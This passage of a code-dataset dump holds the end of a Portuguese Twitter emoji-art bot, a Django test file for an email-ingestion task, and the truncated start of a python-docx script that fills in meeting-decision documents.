)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n'''\r\n # DNA 2 emojis\r\n elif (qlPostar == 1):\r\n emotesUsar = list(random.sample(todosEmotes, 2))\r\n statusText = f'''{frases[random.randint(0, len(frases) - 1)]}\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n⬜⬜{emotesUsar[0]}⬜⬜\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n⬜⬜{emotesUsar[1]}⬜⬜\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n⬜⬜{emotesUsar[0]}⬜⬜\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n⬜⬜{emotesUsar[1]}⬜⬜\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n '''\r\n # Guerra de emoji\r\n elif (qlPostar == 2):\r\n emotesUsar = list(random.sample(todosEmotes, 3))\r\n statusText = f'''\r\n QUEM GANHA??\r\n RT | FAV\r\n{emotesUsar[0]}⬜⬜⬜🆚⬜⬜⬜{emotesUsar[2]}\r\n⬜{emotesUsar[0]}⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n⬜⬜{emotesUsar[0]}⬜🆚⬜⬜{emotesUsar[2]}⬜\r\n{emotesUsar[0]}⬜⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n⬜⬜⬜⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜⬜{emotesUsar[0]}⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚⬜⬜⬜⬜\r\n⬜⬜⬜{emotesUsar[0]}🆚⬜⬜{emotesUsar[2]}⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜⬜⬜{emotesUsar[0]}🆚⬜⬜{emotesUsar[2]}⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n'''\r\n\r\n print('\\nTweetando:')\r\n print(statusText)\r\n resp = input(\"Publicar?(S/N)\\n\")\r\n if(resp == \"S\" or resp == \"s\"):\r\n api.update_status(status=statusText)\r\n 
break\r\n resp = input(\"Gerar outro?(S/N)\\n\")\r\n if (resp == \"N\" or resp == \"n\"):\r\n break\r\n\r\n\r\ndef main():\r\n print('Bom dia')\r\n for categoria in emojis.db.get_categories():\r\n #print(categoria)\r\n for emote in emojis.db.get_emojis_by_category(categoria):\r\n #print(emote[1])\r\n if(len(emote[1]) == 1):\r\n todosEmotes.append(emote[1])\r\n #print(todosEmotes)\r\n resp = input('''\r\n Escolha uma opção:\r\n 1 - Tweetar\r\n 2 - Rodar HG\r\n S - sair\r\n ''')\r\n if(resp == \"1\"):\r\n tweetToTwitter()\r\n elif (resp == \"2\"):\r\n hungerGamesEvent()\r\n else:\r\n print('flw enton')\r\nif __name__ == \"__main__\":\r\n hungerGamesEvent()\r\n #main()","repo_name":"gabrielhbcs/emojiCreatorBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":27678,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"39330165340","text":"from unittest import mock\n\nimport pytest\nfrom django.test.utils import override_settings\n\nfrom datahub.email_ingestion.mailbox import MailboxHandler\nfrom datahub.email_ingestion.tasks import ingest_emails\nfrom datahub.email_ingestion.test.utils import MAILBOXES_SETTING, mock_import_string\nfrom datahub.feature_flag.models import FeatureFlag\nfrom datahub.feature_flag.test.factories import FeatureFlagFactory\nfrom datahub.interaction import INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME\n\n\n@pytest.fixture()\ndef interaction_email_ingestion_feature_flag():\n \"\"\"\n Creates the email ingestion feature flag.\n \"\"\"\n yield FeatureFlagFactory(code=INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME)\n\n\n@pytest.mark.django_db\n@pytest.mark.usefixtures('interaction_email_ingestion_feature_flag')\nclass TestIngestEmails:\n \"\"\"\n Test ingest_emails celery task.\n \"\"\"\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_emails_lock_acquired(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are processed when the lock is acquired.\n \"\"\"\n # Mock import_string to avoid import errors for processor_class path strings\n mock_import_string(monkeypatch)\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n # Refresh the mailbox_handler singleton as we have overidden the MAILBOXES setting\n mailbox_handler = MailboxHandler()\n mailbox_handler.initialise_mailboxes()\n monkeypatch.setattr(\n 'datahub.email_ingestion.tasks.mailbox_handler',\n mailbox_handler,\n )\n ingest_emails()\n assert process_new_mail_patch.call_count == 2\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_emails_lock_not_acquired(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are not processed when the lock cannot be acquired successfully.\n \"\"\"\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n # Have to mock rather than acquire the lock as locks are per connection (if the lock is\n # already held by the current connection, the current connection can still re-acquire it).\n advisory_lock_mock = mock.MagicMock()\n advisory_lock_mock.return_value.__enter__.return_value = False\n monkeypatch.setattr('datahub.email_ingestion.tasks.advisory_lock', advisory_lock_mock)\n\n ingest_emails()\n assert process_new_mail_patch.called is False\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_feature_flag_inactive(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are not processed when the feature flag is not active.\n \"\"\"\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n flag = FeatureFlag.objects.get(code=INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME)\n flag.is_active = False\n flag.save()\n\n ingest_emails()\n assert process_new_mail_patch.called is 
False\n","repo_name":"uktrade/data-hub-api-actions-test","sub_path":"datahub/email_ingestion/test/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"22604732728","text":"import docx\nimport time as t\nfrom docx.shared import Pt, Mm\nfrom docx.enum.text import WD_PARAGRAPH_ALIGNMENT, WD_LINE_SPACING\n\n\ndef create_decision(name, type, date_time, form, questions, zaoch_list, protocol_date, current_date):\n new_form = form.replace('ой', 'ого')\n type = type.replace('ое', 'ого')\n total_ochno = questions[0].yes + questions[0].no + questions[0].idk\n total_zaochno = zaoch_list[0][0]+zaoch_list[0][1]+zaoch_list[0][2]\n\n if (total_ochno + total_zaochno) > 0.5*49:\n quorum = 'да'\n else:\n quorum = 'нет'\n\n doc = docx.Document(name)\n for para in doc.paragraphs:\n text = para.text\n text = text.replace('<